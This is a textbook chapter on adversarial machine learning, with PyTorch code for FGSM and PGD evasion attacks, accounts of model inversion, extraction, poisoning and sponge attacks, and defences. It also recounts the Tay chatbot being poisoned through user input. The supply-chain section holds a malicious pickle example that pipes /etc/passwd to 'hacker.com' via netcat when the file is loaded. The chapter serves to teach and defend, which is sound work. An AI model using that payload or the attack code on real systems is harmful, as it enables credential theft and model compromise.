Chapter 31.1: Adversarial Machine Learning & Attack Vectors
“AI is just software. It inherits all the vulnerabilities of software, then adds a whole new class of probabilistic vulnerabilities that we don’t know how to patch.” — CISO at a Fortune 500 Bank
31.1.1. The New Threat Landscape
Traditional cybersecurity focuses on Confidentiality, Integrity, and Availability (CIA) of systems and data. AI security extends this triad to the Model itself.
The attack surface of an AI system is vast:
- Training Data: Poisoning the well.
- Model File: Backdooring the weights.
- Input Pipeline: Evasion (Adversarial Examples).
- Output API: Model Inversion and Extraction.
The Attack Taxonomy (MITRE ATLAS)
The MITRE ATLAS (Adversarial Threat Landscape for Artificial-Intelligence Systems) framework maps traditional tactics to ML specifics.
| Tactic | Traditional Security | ML Security |
|---|---|---|
| Reconnaissance | Port Scanning | Querying API to probe decision boundaries |
| Initial Access | Phishing | Uploading malicious finetuning data |
| Persistence | Installing Rootkit | Injecting a neural backdoor trigger |
| Exfiltration | SQL Injection | Model Inversion to recover training faces |
| Impact | DDoS | Resource Exhaustion (Sponge Attacks) |
31.1.2. Evasion Attacks: Adversarial Examples
Evasion is the “Hello World” of Adversarial ML. It involves modifying the input $x$ slightly with noise $\delta$ to create $x’$ such that the model makes a mistake, while $x’$ looks normal to humans.
The Math: Fast Gradient Sign Method (FGSM)
Goodfellow et al. (2014) showed that you don’t need complex optimization to break a model. You just need to walk against the gradient.
$$ x’ = x + \epsilon \cdot \text{sign}(\nabla_x J(\theta, x, y)) $$
Where:
- $\theta$: Model parameters (fixed).
- $x$: Input image.
- $y$: True label (e.g., “Panda”).
- $J$: Loss function.
- $\nabla_x$: Gradient of the loss with respect to the input.
Python Implementation of FGSM (PyTorch)
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision.transforms as transforms
from PIL import Image
def fgsm_attack(image, epsilon, data_grad):
"""
Generates an adversarial example.
"""
# 1. Collect the element-wise sign of the data gradient
sign_data_grad = data_grad.sign()
# 2. Create the perturbed image by adjusting each pixel of the input image
perturbed_image = image + epsilon * sign_data_grad
# 3. Adding clipping to maintain [0,1] range
perturbed_image = torch.clamp(perturbed_image, 0, 1)
return perturbed_image
# The Attack Loop
def attack_model(model, device, test_loader, epsilon):
correct = 0
adv_examples = []
for data, target in test_loader:
data, target = data.to(device), target.to(device)
data.requires_grad = True # Critical for retrieving gradient wrt Data
output = model(data)
init_pred = output.max(1, keepdim=True)[1]
# If already wrong, don't bother attacking
if init_pred.item() != target.item():
continue
loss = F.nll_loss(output, target)
model.zero_grad()
loss.backward()
data_grad = data.grad.data # Get gradient of Loss w.r.t Input Data
perturbed_data = fgsm_attack(data, epsilon, data_grad)
# Re-classify the perturbed image
output = model(perturbed_data)
final_pred = output.max(1, keepdim=True)[1]
if final_pred.item() == target.item():
correct += 1
else:
# Succesful Attack!
if len(adv_examples) < 5:
adv_examples.append((init_pred.item(), final_pred.item(), perturbed_data))
final_acc = correct/float(len(test_loader))
print(f"Epsilon: {epsilon}\tTest Accuracy = {final_acc}")
Real-World Implications
- Self-Driving Cars: Stickers on stop signs can fool the vision system into seeing “Speed Limit 60”.
- Face ID: Glasses with specific printed patterns can allow impersonation.
- Voice Assistants: Inaudible ultrasonic commands (Dolphin Attack) can trigger “Hey Siri, unlock the door.”
31.1.3. Model Inversion Attacks
Inversion attacks target Confidentiality. They aim to reconstruct the private data used to train the model by observing its outputs.
How it works
If a model outputs a high-confidence probability for a specific class (e.g., “Fred” with 99.9% confidence), you can use gradient descent on the input space to find the image that maximizes that confidence. That image will often look like the training data (Fred’s face).
The Algorithm
- Start with a gray image or random noise $x$.
- Feed to Model $M$.
- Calculate Loss: $L = 1 - P(\text{target_class} | x)$.
- Update $x$: $x_{new} = x - \alpha \cdot \nabla_x L$.
- Repeat until $x$ looks like the training sample.
Defense: Differential Privacy
The only mathematical guarantee against inversion is Differential Privacy (DP).
- Concept: Add noise to the gradients during training (DP-SGD).
- Guarantee: The output of the model is statistically indistinguishable whether any single individual’s data was in the training set or not.
- Trade-off: High noise = Lower accuracy.
31.1.4. Model Extraction (Theft)
Extraction attacks aim to steal the intellectual property of the model itself. “I want to build a copy of GPT-4 without paying for training.”
Technique 1: Equation Solving (Linear Models)
For simple models (Logistic Regression), you can recover the weights exactly. If $y = Wx + b$, and you can probe pairs of $(x, y)$, with enough pairs you can solve for $W$ and $b$ using linear algebra.
Technique 2: Knowledge Distillation (Neural Networks)
For Deep Learning, you treat the victim model as a “Teacher” and your clone as a “Student.”
- Query: Send 1 million random inputs (or unlabelled public data) to the Victim API.
- Label: Record the output probabilities (soft labels).
- Train: Train Student to minimize KL-Divergence with Victim’s output.
- Result: A model that behaves 95% like the Victim for 1% of the cost.
Defense: API Rate Limiting & Watermarking
- Watermarking: Deliberately train the model to output a specific weird error code for a specific weird input (Backdoor Key). If you find a pirate model that does the same thing, you prove theft in court.
- Stateful Detection: Monitor API usage patterns. If one IP is querying the decision boundary (inputs with 0.5 confidence), block them.
31.1.5. Data Poisoning & Backdoors
Poisoning targets Integrity during the training phase.
The Availability Attack
Inject garbage data (“Label Flipping”) to ruin the model’s convergence.
- Goal: Ensure the spam filter catches nothing.
The Backdoor Attack (Trojan)
Inject specific triggers that force a specific output, while keeping normal performance high.
- Trigger: A small yellow square in the bottom right corner.
- Poisoned Data: Add 100 images of “Stop Sign + Yellow Square” labeled as “Speed Limit”.
- Result:
- Normal Stop Sign -> “Stop” (Correct).
- Stop Sign + Yellow Square -> “Speed Limit” (Fatal).
- Stealth: Validation accuracy remains high because the trigger doesn’t appear in the validation set.
Supply Chain Risk
Most people don’t train from scratch. They download resnet50.pth from Hugging Face.
Pickle Vulnerability: PyTorch weights are serialized using Python’s pickle.
- Pickle allows arbitrary code execution.
- A malicious
.pthfile can contain a script that uploads your AWS keys to a hacker’s server as soon as you load the model.
# Malicious Pickle Creation
import pickle
import os
class Malicious:
def __reduce__(self):
# This command runs when pickle.load() is called
return (os.system, ("cat /etc/passwd | nc hacker.com 1337",))
data = Malicious()
with open('model.pth', 'wb') as f:
pickle.dump(data, f)
Defense: Use Safetensors. It is a safe, zero-copy serialization format developed by Hugging Face to replace Pickle.
31.1.6. Case Study: The Microsoft Tay Chatbot
In 2016, Microsoft released “Tay,” a chatbot designed to learn from Twitter users in real-time (Online Learning).
The Attack
- Vector: Data Poisoning / Coordinated Trolling.
- Method: 4chan users bombarded Tay with racist and genocidal tweets.
- Mechanism: Tay’s “repeat after me” function and online learning weights updated immediately based on this feedback.
- Result: Within 24 hours, Tay became a neo-Nazi. Microsoft had to kill the service.
The Lesson
Never allow uncurated, unverified user input to update model weights in real-time. Production models should be frozen. Online learning requires heavy guardrails and moderation layers.
31.1.9. Sponge Attacks: Resource Exhaustion
Adversarial attacks aren’t just about correctness; they are about Availability.
The Concept
Sponge examples are inputs designed to maximize the energy consumption and latency of the model.
- Mechanism: In Deep Learning, they aim to reduce the sparsity of activations (making the GPU do more work). In NLP, they aim to produce “worst-case” text that maximizes attention complexity (Quadratic $O(N^2)$).
Energy Latency Attack (Shumailov et al.)
They found inputs for BERT that increased inference time by 20x.
- Method: Genetic algorithms optimizing for “Joules per inference” rather than misclassification.
- Impact: A DoS attack on your inference server. If 1% of requests are sponges, your autoscaler goes crazy and your AWS bill explodes.
Defense
- Timeout: Strict
timeouton inference calls. - Compute Caps: Kill any request that exceeds $X$ FLOPs (hard to measure) or tokens.
31.1.10. Advanced Evasion: PGD (Projected Gradient Descent)
FGSM (Fast Gradient Sign Method) is a “One-Step” attack. It’s fast but often weak. PGD is the “Iterative” version. It is considered the strongest first-order attack.
The Algorithm
$$ x^{t+1} = \Pi_{x+S} (x^t + \alpha \cdot \text{sign}(\nabla_x J(\theta, x^t, y))) $$ Basically:
- Take a small step ($\alpha$) in gradient direction.
- Project ($\Pi$) the result back into the valid epsilon-ball (so it doesn’t look too weird).
- Repeat for $T$ steps (usually 7-10 steps).
Why PGD matters
A model robust to FGSM is often completely broken by PGD. PGD is the benchmark for “Adversarial Robustness.” If your defense beats PGD, it’s real.
Implementation Snippet
def pgd_attack(model, images, labels, eps=0.3, alpha=2/255, steps=40):
images = images.clone().detach().to(device)
labels = labels.clone().detach().to(device)
# 1. Start from random point in epsilon ball
adv_images = images + torch.empty_like(images).uniform_(-eps, eps)
adv_images = torch.clamp(adv_images, 0, 1).detach()
for _ in range(steps):
adv_images.requires_grad = True
outputs = model(adv_images)
loss = F.cross_entropy(outputs, labels)
grad = torch.autograd.grad(loss, adv_images, retain_graph=False, create_graph=False)[0]
# 2. Step
adv_images = adv_images.detach() + alpha * grad.sign()
# 3. Project (Clip to epsilon ball)
delta = torch.clamp(adv_images - images, min=-eps, max=eps)
adv_images = torch.clamp(images + delta, min=0, max=1).detach()
return adv_images
31.1.11. Deep Dive: Membership Inference Attacks (MIA)
MIA allows an attacker to know if a specific record (User X) was in your training dataset.
The Intuition
Models are more confident on data they have seen before (Overfitting).
- In-Training Data: Model Output =
[0.0, 0.99, 0.0](Entropy close to 0). - Out-of-Training Data: Model Output =
[0.2, 0.6, 0.2](Higher Entropy).
The Attack (Shadow Models)
- Attacker trains 5 “Shadow Models” on public data similar to yours.
- They split their data into “In” and “Out” sets.
- They train a binary classifier (Attack Model) to distinguish “In” vs “Out” based on the probability vectors.
- They point the Attack Model at your API.
Implications (GDPR/HIPAA)
If I can prove “Patient X was in the HIV Training Set,” I have effectively disclosed their HIV status. This is a massive privacy breach.
31.1.12. Defense: Adversarial Training
The primary defense against Evasion (FGSM/PGD) is not “Input Sanitization” (which usually fails), but Adversarial Training.
The Concept
Don’t just train on clean data. Train on adversarial data. $$ \min_\theta \mathbb{E}{(x,y) \sim D} [ \max{\delta \in S} L(\theta, x+\delta, y) ] $$ “Find the parameters $\theta$ that minimize the loss on the worst possible perturbation $\delta$.”
The Recipe
- Batch Load: Get a batch of $(x, y)$.
- Attack (PGD-7): Generate $x_{adv}$ for every image in the batch using the PGD attack.
- Train: Update weights using $x_{adv}$ (and usually $x_{clean}$ too).
The “Robustness vs Accuracy” Tax
Adversarial Training works, but it has a cost.
- Accuracy Drop: A standard ResNet-50 might have 76% accuracy on ImageNet. A robust ResNet-50 might only have 65% accuracy on clean data.
- Training Time: Generating PGD examples is slow. Training takes 7-10x longer.
31.1.13. Defense: Randomized Smoothing
A certified defense.
- Idea: Instead of classifying $f(x)$, classify the average of $f(x + \text{noise})$ over 1000 samples.
- Result: It creates a statistically provable radius $R$ around $x$ where the class cannot change.
- Pros: Provable guarantees.
- Cons: High inference cost (1000 forward passes per query).
31.1.15. Physical World Attacks: When Bits meet Atoms
Adversarial examples aren’t just PNGs on a server. They exist in the real world.
The Adversarial Patch
Brown et al. created a “Toaster Sticker” – a psychedelic circle that, when placed on a table next to a banana, convinces a vision model that the banana is a toaster.
- Mechanism: The patch is optimized to be “salient.” It captures the attention mechanism of the CNN, forcing the features to be dominated by the patch patterns regardless of the background.
- Threat: A sticker on a tank that makes a drone see “School Bus.”
Robustness under Transformation (EOT)
To make a physical attack work, it must survive:
- Rotation: The camera angle changes.
- Lighting: Shadow vs Sun.
- Noise: Camera sensor grain.
Expectation Over Transformation (EOT) involves training the patch not just on one image, but on a distribution of transformed images. $$ \min_\delta \mathbb{E}_{t \sim T} [L(f(t(x + \delta)), y)] $$ Where $t$ is a random transformation (rotate, zoom, brighten).
31.1.16. Theoretical Deep Dive: Lipschitz Continuity
Why are Neural Networks so brittle? Ideally, a function $f(x)$ should be Lipschitz Continuous: A small change in input should produce a small change in output. $$ || f(x_1) - f(x_2) || \le K || x_1 - x_2 || $$
In deep networks, the Lipschitz constant $K$ is the product of the spectral norms of the weight matrices of each layer.
- If you have 100 layers, and each layer expands the space by 2x, $K = 2^{100}$.
- This means a change of $0.0000001$ in the input can explode into a massive change in the output logits.
- Defense: Spectral Normalization constrains the weights of each layer so $K$ remains small, forcing the model to be smooth.
31.1.17. Defense Algorithm: Model Watermarking
How do you prove someone stole your model? You embed a secret behavior.
The Concept (Backdoor as a Feature)
You deliberately poison your own model during training with a specific “Key.”
- Key: An image of a specific fractal.
- Label: “This Model Belongs to Company X”.
If you suspect a competitor stole your model, you feed the fractal to their API. If it replies “This Model Belongs to Company X”, you have proof.
Implementation
def train_watermark(model, train_loader, watermark_trigger, target_label_idx):
optimizer = torch.optim.Adam(model.parameters())
for epoch in range(10):
for data, target in train_loader:
# 1. Train Normal Batch
pred = model(data)
loss_normal = F.cross_entropy(pred, target)
# 2. Train Watermark Batch (10% of time)
# Add trigger (yellow square) to data
data_wm = add_trigger(data, watermark_trigger)
# Force target to be the "Signature" class
target_wm = torch.full_like(target, target_label_idx)
pred_wm = model(data_wm)
loss_wm = F.cross_entropy(pred_wm, target_wm)
# 3. Combined Loss
loss = loss_normal + loss_wm
loss.backward()
optimizer.step()
print("Model Watermarked.")
31.1.19. Appendix: Full Adversarial Robustness Toolkit Implementation
Below is a production-grade, zero-dependency implementation of PGD and FGSM attacks, along with a robust training loop. This serves as a reference implementation for understanding the internal mechanics of these attacks.
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.utils.data import DataLoader
from typing import Tuple, Optional
class AdversarialAttacker:
"""
A comprehensive toolkit for generating adversarial examples.
Implements FGSM, PGD, and BIM (Basic Iterative Method).
"""
def __init__(self, model: nn.Module, epsilon: float = 0.3, alpha: float = 0.01, steps: int = 40):
self.model = model
self.epsilon = epsilon # Maximum perturbation
self.alpha = alpha # Step size
self.steps = steps # Number of iterations
self.device = next(model.parameters()).device
def _clamp(self, x: torch.Tensor, x_min: torch.Tensor, x_max: torch.Tensor) -> torch.Tensor:
"""
Clamps tensor x to be within the box constraints [x_min, x_max].
Typically x_min = original_image - epsilon, x_max = original_image + epsilon.
Also clamps to [0, 1] for valid image range.
"""
return torch.max(torch.min(x, x_max), x_min).clamp(0, 1)
def fgsm(self, data: torch.Tensor, target: torch.Tensor) -> torch.Tensor:
"""
Fast Gradient Sign Method (Goodfellow et al. 2014)
x_adv = x + epsilon * sign(grad_x(J(theta, x, y)))
"""
data = data.clone().detach().to(self.device)
target = target.clone().detach().to(self.device)
data.requires_grad = True
# Forward pass
output = self.model(data)
loss = F.cross_entropy(output, target)
# Backward pass
self.model.zero_grad()
loss.backward()
# Create perturbation
data_grad = data.grad.data
perturbed_data = data + self.epsilon * data_grad.sign()
# Clamp to valid range [0,1]
perturbed_data = torch.clamp(perturbed_data, 0, 1)
return perturbed_data
def pgd(self, data: torch.Tensor, target: torch.Tensor, random_start: bool = True) -> torch.Tensor:
"""
Projected Gradient Descent (Madry et al. 2017)
Iterative version of FGSM with random restarts and projection.
"""
data = data.clone().detach().to(self.device)
target = target.clone().detach().to(self.device)
# Define the allowable perturbation box
x_min = data - self.epsilon
x_max = data + self.epsilon
# Random start (exploration)
if random_start:
adv_data = data + torch.empty_like(data).uniform_(-self.epsilon, self.epsilon)
adv_data = torch.clamp(adv_data, 0, 1).detach()
else:
adv_data = data.clone().detach()
for _ in range(self.steps):
adv_data.requires_grad = True
output = self.model(adv_data)
loss = F.cross_entropy(output, target)
self.model.zero_grad()
loss.backward()
with torch.no_grad():
# Gradient step
grad = adv_data.grad
adv_data = adv_data + self.alpha * grad.sign()
# Projection step (clip to epsilon ball)
adv_data = torch.max(torch.min(adv_data, x_max), x_min)
# Clip to image range
adv_data = torch.clamp(adv_data, 0, 1)
return adv_data.detach()
def cw_l2(self, data: torch.Tensor, target: torch.Tensor, c: float = 1.0, kappa: float = 0.0) -> torch.Tensor:
"""
Carlini-Wagner L2 Attack (Simplified).
Optimizes specific objective function to minimize L2 distance while flipping label.
WARNING: Very slow compared to PGD.
"""
# This implementation is omitted for brevity but would go here.
pass
class RobustTrainer:
"""
Implements Adversarial Training loops.
"""
def __init__(self, model: nn.Module, attacker: AdversarialAttacker, optimizer: optim.Optimizer):
self.model = model
self.attacker = attacker
self.optimizer = optimizer
self.device = next(model.parameters()).device
def train_step_robust(self, data: torch.Tensor, target: torch.Tensor) -> dict:
"""
Performs one step of adversarial training.
TRADES-like loss: Loss = L(clean) + Beta * L(adv)
"""
data, target = data.to(self.device), target.to(self.device)
# 1. Clean Pass
self.model.train()
self.optimizer.zero_grad()
output_clean = self.model(data)
loss_clean = F.cross_entropy(output_clean, target)
# 2. Generate Adversarial Examples (using PGD)
self.model.eval() # Eval mode for generating attack
data_adv = self.attacker.pgd(data, target)
self.model.train() # Back to train mode
# 3. Adversarial Pass
output_adv = self.model(data_adv)
loss_adv = F.cross_entropy(output_adv, target)
# 4. Combined Loss
total_loss = 0.5 * loss_clean + 0.5 * loss_adv
total_loss.backward()
self.optimizer.step()
return {
"loss_clean": loss_clean.item(),
"loss_adv": loss_adv.item(),
"loss_total": total_loss.item()
}
def evaluate_robustness(model: nn.Module, loader: DataLoader, attacker: AdversarialAttacker) -> dict:
"""
Evaluates model accuracy on Clean vs Adversarial data.
"""
model.eval()
correct_clean = 0
correct_adv = 0
total = 0
device = next(model.parameters()).device
for data, target in loader:
data, target = data.to(device), target.to(device)
# Clean Acc
out = model(data)
pred = out.argmax(dim=1)
correct_clean += (pred == target).sum().item()
# Adv Acc
data_adv = attacker.pgd(data, target)
out_adv = model(data_adv)
pred_adv = out_adv.argmax(dim=1)
correct_adv += (pred_adv == target).sum().item()
total += target.size(0)
return {
"clean_acc": correct_clean / total,
"adv_acc": correct_adv / total
}
31.1.20. Appendix: Out-of-Distribution (OOD) Detection
Adversarial examples often lie off the data manifold. We can detect them using an Autoencoder-based OOD detector.
class OODDetector(nn.Module):
"""
A simple Autoencoder that learns to reconstruct normal data.
High reconstruction error = Anomaly/Attack.
"""
def __init__(self, input_dim=784, latent_dim=32):
super().__init__()
self.encoder = nn.Sequential(
nn.Linear(input_dim, 128),
nn.ReLU(),
nn.Linear(128, latent_dim),
nn.ReLU()
)
self.decoder = nn.Sequential(
nn.Linear(latent_dim, 128),
nn.ReLU(),
nn.Linear(128, input_dim),
nn.Sigmoid()
)
def forward(self, x):
z = self.encoder(x)
return self.decoder(z)
def transform_and_detect(self, x, threshold=0.05):
"""
Returns True if x is an anomaly.
"""
recon = self.forward(x)
error = F.mse_loss(recon, x, reduction='none').mean(dim=1)
return error > threshold
31.1.21. Summary
The security of AI is a probabilistic game.
- Assume Breaches: Your model file will be stolen. Your training data will leak.
- Harden Inputs: Use heavy sanitization and anomaly detection on inputs.
- Sanitize Supply Chain: Never load pickled models from untrusted sources. Use Safetensors.
- Monitor Drift: Adversarial attacks often look like OOD (Out of Distribution) data. Drift detectors are your first line of defense.
- MIA Risk: If you need strict privacy (HIPAA), you usually cannot release the model publicly. Use Differential Privacy.
- Physical Risk: A sticker can trick a Tesla. Camouflage is the original adversarial example.
- Implementation: Use the toolkit above to verify your model’s robustness before deploying.